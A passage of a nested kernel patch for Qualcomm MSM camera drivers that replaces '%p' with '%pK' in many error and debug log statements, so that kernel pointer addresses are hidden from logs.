-+ pr_err("%s:%d failed: vfe_dev->hw_info %pK\n", __func__,
- __LINE__, vfe_dev->hw_info);
- return -EINVAL;
- }
-@@ -505,13 +505,13 @@ static int msm_isp_get_clk_rates(struct vfe_device *vfe_dev,
- int32_t rc = 0;
- uint32_t svs = 0, nominal = 0, turbo = 0;
- if (!vfe_dev || !rates) {
-- pr_err("%s:%d failed: vfe_dev %p rates %p\n", __func__,
-+ pr_err("%s:%d failed: vfe_dev %pK rates %pK\n", __func__,
- __LINE__, vfe_dev, rates);
- return -EINVAL;
- }
-
- if (!vfe_dev->pdev) {
-- pr_err("%s:%d failed: vfe_dev->pdev %p\n", __func__,
-+ pr_err("%s:%d failed: vfe_dev->pdev %pK\n", __func__,
- __LINE__, vfe_dev->pdev);
- return -EINVAL;
- }
-@@ -519,7 +519,7 @@ static int msm_isp_get_clk_rates(struct vfe_device *vfe_dev,
- of_node = vfe_dev->pdev->dev.of_node;
-
- if (!of_node) {
-- pr_err("%s %d failed: of_node = %p\n", __func__,
-+ pr_err("%s %d failed: of_node = %pK\n", __func__,
- __LINE__, of_node);
- return -EINVAL;
- }
-@@ -728,7 +728,7 @@ static int msm_isp_set_dual_HW_master_slave_mode(
- unsigned long flags;
-
- if (!vfe_dev || !arg) {
-- 
pr_err("%s: Error! Invalid input vfe_dev %p arg %p\n",
-+ pr_err("%s: Error! Invalid input vfe_dev %pK arg %pK\n",
- __func__, vfe_dev, arg);
- return -EINVAL;
- }
-@@ -819,7 +819,7 @@ static int msm_isp_proc_cmd_list_unlocked(struct vfe_device *vfe_dev, void *arg)
- struct msm_vfe_cfg_cmd_list cmd, cmd_next;
-
- if (!vfe_dev || !arg) {
-- pr_err("%s:%d failed: vfe_dev %p arg %p", __func__, __LINE__,
-+ pr_err("%s:%d failed: vfe_dev %pK arg %pK", __func__, __LINE__,
- vfe_dev, arg);
- return -EINVAL;
- }
-@@ -889,7 +889,7 @@ static int msm_isp_proc_cmd_list_compat(struct vfe_device *vfe_dev, void *arg)
- struct msm_vfe_cfg_cmd2 current_cmd;
-
- if (!vfe_dev || !arg) {
-- pr_err("%s:%d failed: vfe_dev %p arg %p", __func__, __LINE__,
-+ pr_err("%s:%d failed: vfe_dev %pK arg %pK", __func__, __LINE__,
- vfe_dev, arg);
- return -EINVAL;
- }
-@@ -946,10 +946,10 @@ static long msm_isp_ioctl_unlocked(struct v4l2_subdev *sd,
- struct vfe_device *vfe_dev = v4l2_get_subdevdata(sd);
-
- if (!vfe_dev || !vfe_dev->vfe_base) {
-- pr_err("%s:%d failed: invalid params %p\n",
-+ pr_err("%s:%d failed: invalid params %pK\n",
- __func__, __LINE__, vfe_dev);
- if (vfe_dev)
-- pr_err("%s:%d failed %p\n", __func__,
-+ pr_err("%s:%d failed %pK\n", __func__,
- __LINE__, vfe_dev->vfe_base);
- return -EINVAL;
- }
-@@ -1134,10 +1134,10 @@ static long msm_isp_ioctl_compat(struct v4l2_subdev *sd,
- long rc = 0;
-
- if (!vfe_dev || !vfe_dev->vfe_base) {
-- pr_err("%s:%d failed: invalid params %p\n",
-+ pr_err("%s:%d failed: invalid params %pK\n",
- __func__, __LINE__, vfe_dev);
- if (vfe_dev)
-- pr_err("%s:%d failed %p\n", __func__,
-+ pr_err("%s:%d failed %pK\n", __func__,
- __LINE__, vfe_dev->vfe_base);
- return -EINVAL;
- }
-@@ -1183,13 +1183,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- uint32_t *cfg_data, uint32_t cmd_len)
- {
- if (!vfe_dev || !reg_cfg_cmd) {
-- pr_err("%s:%d failed: vfe_dev %p reg_cfg_cmd %p\n", __func__,
-+ pr_err("%s:%d failed: vfe_dev %pK 
reg_cfg_cmd %pK\n", __func__,
- __LINE__, vfe_dev, reg_cfg_cmd);
- return -EINVAL;
- }
- if ((reg_cfg_cmd->cmd_type != VFE_CFG_MASK) &&
- (!cfg_data || !cmd_len)) {
-- pr_err("%s:%d failed: cmd type %d cfg_data %p cmd_len %d\n",
-+ pr_err("%s:%d failed: cmd type %d cfg_data %pK cmd_len %d\n",
- __func__, __LINE__, reg_cfg_cmd->cmd_type, cfg_data,
- cmd_len);
- return -EINVAL;
-@@ -1856,7 +1856,7 @@ static int msm_isp_process_iommu_page_fault(struct vfe_device *vfe_dev)
- {
- int rc = vfe_dev->buf_mgr->pagefault_debug_disable;
-
-- pr_err("%s:%d] VFE%d Handle Page fault! vfe_dev %p\n", __func__,
-+ pr_err("%s:%d] VFE%d Handle Page fault! vfe_dev %pK\n", __func__,
- __LINE__, vfe_dev->pdev->id, vfe_dev);
-
- msm_isp_halt_send_error(vfe_dev, ISP_EVENT_IOMMU_P_FAULT);
-@@ -2048,7 +2048,7 @@ void msm_isp_do_tasklet(unsigned long data)
- uint32_t irq_status0, irq_status1, pingpong_status;
-
- if (vfe_dev->vfe_base == NULL || vfe_dev->vfe_open_cnt == 0) {
-- ISP_DBG("%s: VFE%d open cnt = %d, device closed(base = %p)\n",
-+ ISP_DBG("%s: VFE%d open cnt = %d, device closed(base = %pK)\n",
- __func__, vfe_dev->pdev->id, vfe_dev->vfe_open_cnt,
- vfe_dev->vfe_base);
- return;
-@@ -2121,7 +2121,7 @@ static void msm_vfe_iommu_fault_handler(struct iommu_domain *domain,
- vfe_dev->page_fault_addr = iova;
- if (!vfe_dev->buf_mgr || !vfe_dev->buf_mgr->ops ||
- !vfe_dev->axi_data.num_active_stream) {
-- pr_err("%s:%d buf_mgr %p active strms %d\n", __func__,
-+ pr_err("%s:%d buf_mgr %pK active strms %d\n", __func__,
- __LINE__, vfe_dev->buf_mgr,
- vfe_dev->axi_data.num_active_stream);
- goto end;
-@@ -2138,7 +2138,7 @@ static void msm_vfe_iommu_fault_handler(struct iommu_domain *domain,
- }
- mutex_unlock(&vfe_dev->core_mutex);
- } else {
-- ISP_DBG("%s:%d] no token received: %p\n",
-+ ISP_DBG("%s:%d] no token received: %pK\n",
- __func__, __LINE__, token);
- goto end;
- }
-@@ -2173,7 +2173,7 @@ int msm_isp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- }
-
- if 
(vfe_dev->vfe_base) {
-- pr_err("%s:%d invalid params cnt %d base %p\n", __func__,
-+ pr_err("%s:%d invalid params cnt %d base %pK\n", __func__,
- __LINE__, vfe_dev->vfe_open_cnt, vfe_dev->vfe_base);
- vfe_dev->vfe_base = NULL;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 640379d..abfae4f 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -1292,7 +1292,7 @@ static int msm_ispif_set_vfe_info(struct ispif_device *ispif,
- {
- if (!vfe_info || (vfe_info->num_vfe == 0) ||
- (vfe_info->num_vfe > ispif->hw_num_isps)) {
-- pr_err("Invalid VFE info: %p %d\n", vfe_info,
-+ pr_err("Invalid VFE info: %pK %d\n", vfe_info,
- (vfe_info ? vfe_info->num_vfe : 0));
- return -EINVAL;
- }
-@@ -1327,7 +1327,7 @@ static int msm_ispif_init(struct ispif_device *ispif,
-
- if (ispif->csid_version >= CSID_VERSION_V30) {
- if (!ispif->clk_mux_mem || !ispif->clk_mux_io) {
-- pr_err("%s csi clk mux mem %p io %p\n", __func__,
-+ pr_err("%s csi clk mux mem %pK io %pK\n", __func__,
- ispif->clk_mux_mem, ispif->clk_mux_io);
- rc = -ENOMEM;
- return rc;
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-index 9339029..071ce0a 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -805,7 +805,7 @@ void msm_jpeg_hw_write(struct msm_jpeg_hw_cmd *hw_cmd_p,
-
- new_data = hw_cmd_p->data & hw_cmd_p->mask;
- new_data |= old_data;
-- JPEG_DBG("%s:%d] %p %08x\n", __func__, __LINE__,
-+ JPEG_DBG("%s:%d] %pK %08x\n", __func__, __LINE__,
- paddr, new_data);
- msm_camera_io_w(new_data, paddr);
- }
-@@ -908,7 +908,7 @@ void msm_jpeg_io_dump(void *base, int size)
- int i;
- u32 *p = (u32 *) addr;
- u32 data;
-- JPEG_DBG_HIGH("%s:%d] %p %d", __func__, __LINE__, addr, size);
-+ JPEG_DBG_HIGH("%s:%d] %pK %d", __func__, __LINE__, addr, size);
- line_str[0] = '\0';
- p_str = line_str;
- for (i = 0; i < size/4; i++) {
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-index e076d35..266a5a6 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_platform.c
-@@ -210,7 +210,7 @@ static int32_t msm_jpeg_set_init_dt_parms(struct msm_jpeg_device *pgmn_dev,
- return -EINVAL;
- }
- for (i = 0; i < dt_count; i = i + 2) {
-- JPEG_DBG("%s:%d] %p %08x\n",
-+ JPEG_DBG("%s:%d] %pK %08x\n",
- __func__, __LINE__,
- base + dt_reg_settings[i],
- dt_reg_settings[i + 1]);
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-index 2e2841a..d27f56a 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-@@ -754,7 +754,7 @@ int __msm_jpeg_open(struct msm_jpeg_device *pgmn_dev)
- __LINE__, rc);
- goto platform_init_fail;
- }
-- JPEG_DBG("%s:%d] platform resources - base %p, irq %d\n",
-+ JPEG_DBG("%s:%d] platform resources - base %pK, irq %d\n",
- __func__, __LINE__,
- pgmn_dev->base, 
(int)pgmn_dev->jpeg_irq_res->start);
- msm_jpeg_q_cleanup(&pgmn_dev->evt_q);
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-index 4108693..f3ceaad 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c
-@@ -93,7 +93,7 @@ static inline u32 msm_jpegdma_hw_read_reg(struct msm_jpegdma_device *dma,
- static inline void msm_jpegdma_hw_write_reg(struct msm_jpegdma_device *dma,
- enum msm_jpegdma_mem_resources base_idx, u32 reg, u32 value)
- {
-- pr_debug("%s:%d]%p %08x\n", __func__, __LINE__,
-+ pr_debug("%s:%d]%pK %08x\n", __func__, __LINE__,
- dma->iomem_base[base_idx] + reg,
- value);
- msm_camera_io_w(value, dma->iomem_base[base_idx] + reg);
-diff --git a/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c b/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-index f7246f2..0e4a453 100644
---- a/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-+++ b/drivers/media/platform/msm/camera_v2/msm_vb2/msm_vb2.c
-@@ -248,7 +248,7 @@ static int msm_vb2_put_buf(struct vb2_buffer *vb, int session_id,
- break;
- }
- if (WARN_ON(vb2_buf != vb)) {
-- pr_err("VB buffer is INVALID vb=%p, ses_id=%d, str_id=%d\n",
-+ pr_err("VB buffer is INVALID vb=%pK, ses_id=%d, str_id=%d\n",
- vb, session_id, stream_id);
- spin_unlock_irqrestore(&stream->stream_lock, flags);
- return -EINVAL;
-@@ -290,7 +290,7 @@ static int msm_vb2_buf_done(struct vb2_buffer *vb, int session_id,
- break;
- }
- if (WARN_ON(vb2_buf != vb)) {
-- pr_err("VB buffer is INVALID ses_id=%d, str_id=%d, vb=%p\n",
-+ pr_err("VB buffer is INVALID ses_id=%d, str_id=%d, vb=%pK\n",
- session_id, stream_id, vb);
- spin_unlock_irqrestore(&stream->stream_lock, flags);
- return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 
55fc18e..3ee49db 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -148,7 +148,7 @@ void msm_cpp_vbif_register_error_handler(void *dev,
- int (*client_vbif_error_handler)(void *, uint32_t))
- {
- if (dev == NULL || client >= VBIF_CLIENT_MAX) {
-- pr_err("%s: Fail to register handler! dev = %p, client %d\n",
-+ pr_err("%s: Fail to register handler! dev = %pK,client %d\n",
- __func__, dev, client);
- return;
- }
-@@ -1054,7 +1054,7 @@ int cpp_vbif_error_handler(void *dev, uint32_t vbif_error)
- struct cpp_device *cpp_dev = NULL;
-
- if (dev == NULL || vbif_error >= CPP_VBIF_ERROR_MAX) {
-- pr_err("failed: dev %p, vbif error %d\n", dev, vbif_error);
-+ pr_err("failed: dev %pK,vbif error %d\n", dev, vbif_error);
- return -EINVAL;
- }
-
-@@ -1083,13 +1083,13 @@ static int cpp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- CPP_DBG("E\n");
-
- if (!sd || !fh) {
-- pr_err("Wrong input parameters sd %p fh %p!",
-+ pr_err("Wrong input parameters sd %pK fh %pK!",
- sd, fh);
- return -EINVAL;
- }
- cpp_dev = v4l2_get_subdevdata(sd);
- if (!cpp_dev) {
-- pr_err("failed: cpp_dev %p\n", cpp_dev);
-+ pr_err("failed: cpp_dev %pK\n", cpp_dev);
- return -EINVAL;
- }
- mutex_lock(&cpp_dev->mutex);
-@@ -1112,7 +1112,7 @@ static int cpp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- return -ENODEV;
- }
-
-- CPP_DBG("open %d %p\n", i, &fh->vfh);
-+ CPP_DBG("open %d %pK\n", i, &fh->vfh);
- cpp_dev->cpp_open_cnt++;
- if (cpp_dev->cpp_open_cnt == 1) {
- rc = cpp_init_hardware(cpp_dev);
-@@ -1158,7 +1158,7 @@ static int cpp_close_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- cpp_dev = v4l2_get_subdevdata(sd);
-
- if (!cpp_dev) {
-- pr_err("failed: cpp_dev %p\n", cpp_dev);
-+ pr_err("failed: cpp_dev %pK\n", cpp_dev);
- return -EINVAL;
- }
-
-@@ -1446,7 +1446,7 @@ static void msm_cpp_do_timeout_work(struct work_struct *work)
- mutex_lock(&cpp_dev->mutex);
-
- if 
(!work || (cpp_timer.data.cpp_dev->state != CPP_STATE_ACTIVE)) {
-- pr_err("Invalid work:%p or state:%d\n", work,
-+ pr_err("Invalid work:%pK or state:%d\n", work,
- cpp_timer.data.cpp_dev->state);
- /* Do not flush queue here as it is not a fatal error */
- goto end;
-@@ -2512,7 +2512,7 @@ static int msm_cpp_copy_from_ioctl_ptr(void *dst_ptr,
- {
- int ret;
- if ((ioctl_ptr->ioctl_ptr == NULL) || (ioctl_ptr->len == 0)) {
-- pr_err("%s: Wrong ioctl_ptr %p / len %zu\n", __func__,
-+ pr_err("%s: Wrong ioctl_ptr %pK / len %zu\n", __func__,
- ioctl_ptr, ioctl_ptr->len);
- return -EINVAL;
- }
-@@ -2535,7 +2535,7 @@ static int msm_cpp_copy_from_ioctl_ptr(void *dst_ptr,
- {
- int ret;
- if ((ioctl_ptr->ioctl_ptr == NULL) || (ioctl_ptr->len == 0)) {
-- pr_err("%s: Wrong ioctl_ptr %p / len %zu\n", __func__,
-+ pr_err("%s: Wrong ioctl_ptr %pK / len %zu\n", __func__,
- ioctl_ptr, ioctl_ptr->len);
- return -EINVAL;
- }
-@@ -2607,14 +2607,14 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- break;
- default: {
- if (ioctl_ptr == NULL) {
-- pr_err("Wrong ioctl_ptr %p\n", ioctl_ptr);
-+ pr_err("Wrong ioctl_ptr %pK\n", ioctl_ptr);
- return -EINVAL;
- }
-
- *ioctl_ptr = arg;
- if ((*ioctl_ptr == NULL) ||
- ((*ioctl_ptr)->ioctl_ptr == NULL)) {
-- pr_err("Wrong arg %p\n", arg);
-+ pr_err("Wrong arg %pK\n", arg);
- return -EINVAL;
- }
- break;
-@@ -2631,7 +2631,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- int rc = 0;
-
- if (sd == NULL) {
-- pr_err("sd %p\n", sd);
-+ pr_err("sd %pK\n", sd);
- return -EINVAL;
- }
- cpp_dev = v4l2_get_subdevdata(sd);
-@@ -2707,7 +2707,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- &cpp_dev->pdev->dev);
- if (rc) {
- dev_err(&cpp_dev->pdev->dev,
-- "Fail to loc blob %s dev %p, rc:%d\n",
-+ "Fail to loc blob %s dev %pK, rc:%d\n",
- cpp_dev->fw_name_bin,
- &cpp_dev->pdev->dev, rc);
- kfree(cpp_dev->fw_name_bin);
-@@ -3170,14 +3170,15 @@ static long msm_cpp_subdev_do_ioctl(
- struct v4l2_fh *vfh = NULL;
-
- if ((arg 
== NULL) || (file == NULL)) {
-- pr_err("Invalid input parameters arg %p, file %p\n", arg, file);
-+ pr_err("Invalid input parameters arg %pK, file %pK\n",
-+ arg, file);
- return -EINVAL;
- }
- vdev = video_devdata(file);
- sd = vdev_to_v4l2_subdev(vdev);
-
- if (sd == NULL) {
-- pr_err("Invalid input parameter sd %p\n", sd);
-+ pr_err("Invalid input parameter sd %pK\n", sd);
- return -EINVAL;
- }
- vfh = file->private_data;
-@@ -3451,7 +3452,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- }
- cpp_dev = v4l2_get_subdevdata(sd);
- if (!vdev || !cpp_dev) {
-- pr_err("Invalid vdev %p or cpp_dev %p structures!",
-+ pr_err("Invalid vdev %pK or cpp_dev %pK structures!",
- vdev, cpp_dev);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-index bf4d359..f2f1dca 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-@@ -56,12 +56,12 @@ static void vpe_mem_dump(const char * const name, const void * const addr,
- int i;
- u32 *p = (u32 *) addr;
- u32 data;
-- VPE_DBG("%s: (%s) %p %d\n", __func__, name, addr, size);
-+ VPE_DBG("%s: (%s) %pK %d\n", __func__, name, addr, size);
- line_str[0] = '\0';
- p_str = line_str;
- for (i = 0; i < size/4; i++) {
- if (i % 4 == 0) {
-- snprintf(p_str, 12, "%p: ", p);
-+ snprintf(p_str, 12, "%pK: ", p);
- p_str += 10;
- }
- data = *p++;
-@@ -614,7 +614,7 @@ static int vpe_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- goto err_mutex_unlock;
- }
-
-- VPE_DBG("open %d %p\n", i, &fh->vfh);
-+ VPE_DBG("open %d %pK\n", i, &fh->vfh);
- vpe_dev->vpe_open_cnt++;
- if (vpe_dev->vpe_open_cnt == 1) {
- rc = vpe_init_hardware(vpe_dev);
-@@ -669,7 +669,7 @@ static int vpe_close_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
- return -ENODEV;
- }
-
-- VPE_DBG("close %d %p\n", i, &fh->vfh);
-+ VPE_DBG("close %d %pK\n", i, 
&fh->vfh);
- vpe_dev->vpe_open_cnt--;
- if (vpe_dev->vpe_open_cnt == 0) {
- vpe_deinit_mem(vpe_dev);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 0ad3d9a..c33e66f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -583,7 +583,7 @@ static int32_t msm_actuator_move_focus(
- if ((a_ctrl->region_size <= 0) ||
- (a_ctrl->region_size > MAX_ACTUATOR_REGION) ||
- (!move_params->ringing_params)) {
-- pr_err("Invalid-region size = %d, ringing_params = %p\n",
-+ pr_err("Invalid-region size = %d, ringing_params = %pK\n",
- a_ctrl->region_size, move_params->ringing_params);
- return -EFAULT;
- }
-@@ -703,7 +703,7 @@ static int32_t msm_actuator_bivcm_move_focus(
- if ((a_ctrl->region_size <= 0) ||
- (a_ctrl->region_size > MAX_ACTUATOR_REGION) ||
- (!move_params->ringing_params)) {
-- pr_err("Invalid-region size = %d, ringing_params = %p\n",
-+ pr_err("Invalid-region size = %d, ringing_params = %pK\n",
- a_ctrl->region_size, move_params->ringing_params);
- return -EFAULT;
- }
-@@ -1516,7 +1516,7 @@ static long msm_actuator_subdev_ioctl(struct v4l2_subdev *sd,
- struct msm_actuator_ctrl_t *a_ctrl = v4l2_get_subdevdata(sd);
- void __user *argp = (void __user *)arg;
- CDBG("Enter\n");
-- CDBG("%s:%d a_ctrl %p argp %p\n", __func__, __LINE__, a_ctrl, argp);
-+ CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, a_ctrl, argp);
- switch (cmd) {
- case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- return msm_actuator_get_subdev_id(a_ctrl, argp);
-@@ -1777,7 +1777,7 @@ static int32_t msm_actuator_i2c_probe(struct i2c_client *client,
- goto probe_failure;
- }
-
-- CDBG("client = 0x%p\n", client);
-+ CDBG("client = 0x%pK\n", client);
-
- rc = of_property_read_u32(client->dev.of_node, "cell-index",
- &act_ctrl_t->subdev_id);
-diff --git 
a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 7099d9f..817870e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -945,7 +945,7 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- uint16_t read_bytes = 0;
-
- if (!sd || !c_ctrl) {
-- pr_err("%s:%d sd %p c_ctrl %p\n", __func__,
-+ pr_err("%s:%d sd %pK c_ctrl %pK\n", __func__,
- __LINE__, sd, c_ctrl);
- return -EINVAL;
- }
-@@ -1238,7 +1238,7 @@ static int32_t msm_cci_i2c_set_sync_prms(struct v4l2_subdev *sd,
-
- cci_dev = v4l2_get_subdevdata(sd);
- if (!cci_dev || !c_ctrl) {
-- pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+ pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- __LINE__, cci_dev, c_ctrl);
- rc = -EINVAL;
- return rc;
-@@ -1260,7 +1260,7 @@ static int32_t msm_cci_init(struct v4l2_subdev *sd,
-
- cci_dev = v4l2_get_subdevdata(sd);
- if (!cci_dev || !c_ctrl) {
-- pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+ pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- __LINE__, cci_dev, c_ctrl);
- rc = -EINVAL;
- return rc;
-@@ -1539,7 +1539,7 @@ static int32_t msm_cci_write(struct v4l2_subdev *sd,
-
- cci_dev = v4l2_get_subdevdata(sd);
- if (!cci_dev || !c_ctrl) {
-- pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+ pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- __LINE__, cci_dev, c_ctrl);
- rc = -EINVAL;
- return rc;
-@@ -1984,7 +1984,7 @@ static int msm_cci_probe(struct platform_device *pdev)
- {
- struct cci_device *new_cci_dev;
- int rc = 0, i = 0;
-- CDBG("%s: pdev %p device id = %d\n", __func__, pdev, pdev->id);
-+ CDBG("%s: pdev %pK device id = %d\n", __func__, pdev, pdev->id);
- new_cci_dev = kzalloc(sizeof(struct cci_device), GFP_KERNEL);
- if (!new_cci_dev) {
- pr_err("%s: no enough memory\n", __func__);
-@@ -1996,7 +1996,7 @@ static int 
msm_cci_probe(struct platform_device *pdev)
- ARRAY_SIZE(new_cci_dev->msm_sd.sd.name), "msm_cci");
- v4l2_set_subdevdata(&new_cci_dev->msm_sd.sd, new_cci_dev);
- platform_set_drvdata(pdev, &new_cci_dev->msm_sd.sd);
-- CDBG("%s sd %p\n", __func__, &new_cci_dev->msm_sd.sd);
-+ CDBG("%s sd %pK\n", __func__, &new_cci_dev->msm_sd.sd);
- if (pdev->dev.of_node)
- of_property_read_u32((&pdev->dev)->of_node,
- "cell-index", &pdev->id);
-@@ -2071,7 +2071,7 @@ static int msm_cci_probe(struct platform_device *pdev)
- if (!new_cci_dev->write_wq[i])
- pr_err("Failed to create write wq\n");
- }
-- CDBG("%s cci subdev %p\n", __func__, &new_cci_dev->msm_sd.sd);
-+ CDBG("%s cci subdev %pK\n", __func__, &new_cci_dev->msm_sd.sd);
- CDBG("%s line %d\n", __func__, __LINE__);
- return 0;
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index ef07a54..46e8594 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -265,7 +265,7 @@ static int msm_csid_config(struct csid_device *csid_dev,
- void __iomem *csidbase;
- csidbase = csid_dev->base;
- if (!csidbase || !csid_params) {
-- pr_err("%s:%d csidbase %p, csid params %p\n", __func__,
-+ pr_err("%s:%d csidbase %pK, csid params %pK\n", __func__,
- __LINE__, csidbase, csid_params);
- return -EINVAL;
- }
-@@ -651,7 +651,7 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg)
- struct csid_cfg_data *cdata = (struct csid_cfg_data *)arg;
-
- if (!csid_dev || !cdata) {
-- pr_err("%s:%d csid_dev %p, cdata %p\n", __func__, __LINE__,
-+ pr_err("%s:%d csid_dev %pK, cdata %pK\n", __func__, __LINE__,
- csid_dev, cdata);
- return -EINVAL;
- }
-@@ -792,7 +792,7 @@ static int32_t msm_csid_cmd32(struct csid_device *csid_dev, void __user *arg)
- cdata = &local_arg;
-
- if (!csid_dev || !cdata) {
-- pr_err("%s:%d csid_dev %p, cdata %p\n", __func__, __LINE__, 
-+ pr_err("%s:%d csid_dev %pK, cdata %pK\n", __func__, __LINE__,
- csid_dev, cdata);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 8363912..7bdaf67 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -497,7 +497,7 @@ static int msm_csiphy_lane_config(struct csiphy_device *csiphy_dev,
- val |= csiphy_params->csid_core;
- }
- msm_camera_io_w(val, csiphy_dev->clk_mux_base);
-- CDBG("%s clk mux addr %p val 0x%x\n", __func__,
-+ CDBG("%s clk mux addr %pK val 0x%x\n", __func__,
- csiphy_dev->clk_mux_base, val);
- /* ensure write is done */
- mb();
-@@ -924,7 +924,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- mipi_csiphy_glbl_pwr_cfg_addr);
- } else {
- if (!csi_lane_params) {
-- pr_err("%s:%d failed: csi_lane_params %p\n", __func__,
-+ pr_err("%s:%d failed: csi_lane_params %pK\n", __func__,
- __LINE__, csi_lane_params);
- return -EINVAL;
- }
-@@ -1030,7 +1030,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- mipi_csiphy_glbl_pwr_cfg_addr);
- } else {
- if (!csi_lane_params) {
-- pr_err("%s:%d failed: csi_lane_params %p\n", __func__,
-+ pr_err("%s:%d failed: csi_lane_params %pK\n", __func__,
- __LINE__, csi_lane_params);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 8e50646..c9f2c8c 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -696,7 +696,7 @@ static long msm_eeprom_subdev_ioctl(struct v4l2_subdev *sd,
- struct msm_eeprom_ctrl_t *e_ctrl = v4l2_get_subdevdata(sd);
- void __user *argp = (void __user *)arg;
- CDBG("%s E\n", __func__);
-- CDBG("%s:%d 
a_ctrl %p argp %p\n", __func__, __LINE__, e_ctrl, argp);
-+ CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, e_ctrl, argp);
- switch (cmd) {
- case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- return msm_eeprom_get_subdev_id(e_ctrl, argp);
